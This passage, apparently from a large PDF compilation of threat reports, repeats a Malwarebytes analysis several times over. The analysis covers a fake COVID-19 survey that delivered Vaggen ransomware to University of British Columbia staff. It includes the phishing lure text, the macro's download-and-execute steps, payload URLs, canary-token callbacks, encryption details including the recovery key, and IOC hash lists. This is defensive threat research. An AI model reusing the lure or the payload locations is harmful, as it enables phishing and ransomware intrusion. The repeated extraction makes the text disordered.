3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2190 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2191 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2192 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2193 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2194 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2195 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2196 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2197 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2198 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2199 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2200 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2201 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2202 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2203 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2204 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2205 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2206 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2207 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2208 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2209 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2210 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2211 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2212 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2213 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2214 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2215 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2216 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2217 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2218 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2219 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2220 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2221 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2222 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular 